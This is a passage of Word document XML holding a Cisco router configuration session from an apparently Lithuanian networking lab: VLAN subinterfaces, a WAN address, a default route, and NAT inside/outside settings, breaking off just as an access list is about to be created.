    <w:p w14:paraId="2CC805BF" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#int gig0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EFB3B4" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#no shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CFAE87" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#ex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFD7AC0" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#int gig0/1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7162927F" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73955F5E" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#encapsulation dot1Q 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7282801A" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#ip address 192.168.2.1 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412174DC" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#no shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E0A9F0" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#ex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D792215" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#int gig0/1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0521318A" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#encapsulation dot1Q 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D926AB8" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#ip address 192.168.3.1 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124D1B33" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#no shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66289F81" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A5ECE4" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656B05C8" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#conf t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BBC948" w14:textId="0484FB22" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76258340" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Enter configuration commands, one per line. End with CNTL/Z.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEF4761" w14:textId="6150DB66" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1722F961" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#int gig0/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEC6F03" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D7A688" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0265E3" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#ip ad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265F86AE" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#ip address 213.234.10.2 255.255.255.252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B337C64" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#no shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AD492F" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4137C081" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#ip route 0.0.0.0 0.0.0.0 213.234.10.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED31F15" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C065B1" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BCD59D" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#wr mem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01224C4A" w14:textId="77698C62" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D727A5" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Building configuration...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B078A03" w14:textId="10DE370D" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB7CDB9" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#ping 213.234.10.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0476B4" w14:textId="4E4C0951" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#ping 213.234.20.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452A3CEA" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1F6EF6" w14:textId="5E4489D4" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66BCF0B6" w14:textId="292E92AC" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Suk</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">riame </w:t>
      </w:r>
      <w:r w:rsidR="0051309A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>prieigos</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> sąrašą:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625B0A4D" w14:textId="5ADD4F7B" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CEF1C9" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#conf t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199D9DCF" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Enter configuration commands, one per line. End with CNTL/Z.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257B00E8" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#int gig0/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52581886" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#ip nat outside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E0DF88" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#ex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333FAF67" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#int gig0/1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B8AF6B" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#ip nat inside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526DBB2A" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#ex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E10462A" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#int gig0/1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FF64AF" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#ip nat inside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23648E99" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAD7480" w14:textId="32241841" w:rsidR="006D2AF4" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#conf t</w:t>
      </w:r>
    </w:p>
